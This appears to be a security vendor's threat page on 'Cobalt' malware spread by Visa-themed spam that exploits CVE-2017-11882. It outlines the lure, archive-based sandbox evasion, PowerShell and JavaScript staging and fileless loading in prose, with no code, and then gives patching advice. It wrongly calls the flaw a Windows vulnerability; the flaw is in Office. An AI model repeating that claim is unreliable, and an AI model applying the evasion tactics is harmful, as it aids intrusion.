Threat Scorecard

Ranking: 3,409
Threat Level: 20 % (Normal)
Infected Computers: 2,143
First Seen: May 5, 2022
Last Seen: May 21, 2023
OS(es) Affected: Windows

Cobalt is a malware infection that is spreading by taking advantage of a vulnerability in Microsoft Windows that has existed for 17 years in this operating system. Although the vulnerability that is being used by Cobalt, CVE-2017-11882, has existed for 17 years, it was only made public and patched by Microsoft in November 2017. Using this vulnerability, the cybercrooks were able to deliver threats by using the Cobalt Strike, a tool used to test vulnerabilities.

A Cobalt Secret Kept for Many Years

Cobalt is delivered through a spam email message that looks like a notification from Visa (the credit card company), supposedly announcing rule changes in its PayWave service in Russia. Victims receive a RTF document named 'Изменения в системе безопасности.doc Visa payWave.doc,' as well as an archive file with the same name. Sending threats in the form of archive files attached to email messages is a very common method of delivering them. The use of password-protected archives for these attacks is a safe way to prevent auto-analysis systems from analyzing the file since they will extract the file in a safe environment to detect threats. However, there is somewhat of a social engineering aspect by including both the corrupted DOC file and the archive in the same message.

When the harmful document being used to deliver Cobalt is opened, a PowerShell script runs in the background. This script downloads and installs Cobalt on the victim's computer, allowing the cybercrooks to take control of the infected computer. During the Cobalt attack, several scripts are downloaded and executed to download and install Cobalt on the victim's computer eventually. When the CVE-2017-11882 exploit is triggered on the infected computer, an obfuscated JavaScript file is downloaded and then executed on the infected computer. This downloads another PowerShell script, which then loads Cobalt to the memory on the infected computer directly. While PowerShell scripts can be a powerful way to make using a computer more convenient and efficient, the way it interacts with the inner workings of a computer and their power has made these scripts one of the preferred tools used in threat attacks. Since Cobalt is loaded into the memory directly and no corrupted DLL file is written onto the victim's hard drives, this makes it more difficult for anti-virus programs to detect that the Cobalt attack is being carried out.

How the Cobalt Attack can Affect You and Your Machine

Once Cobalt is installed on the victim's computer, Cobalt can be used to control the infected computer, as well as to install this threat on other computer systems on the same network. Although officially Cobalt Strike is supposedly a tool for penetration testing, in this case, it is being used to carry out threat attacks. The cybercrooks are always looking for new ways to deliver threats. While new vulnerabilities are quite threatening, very old vulnerabilities like this one, that may not have been properly addressed originally, also pose a threat to computer users. Remember that many computer users fail to patch their software and operating system regularly, meaning that many PCs are vulnerable to many exploits that are quite old and, in some cases, will be overlooked by many anti-virus programs.

Protecting Your Computer from a Threat Like Cobalt

As with most threats, the use of a trustable security program is the best protection against Cobalt and similar threats. However, since an old software exploit is involved in these attacks, PC security researchers advise computer users to ensure that their software and operating system are fully updated with the most recent security patches. This can help computer users prevent threats and other problems as much as using security software.

Related Posts


Most Viewed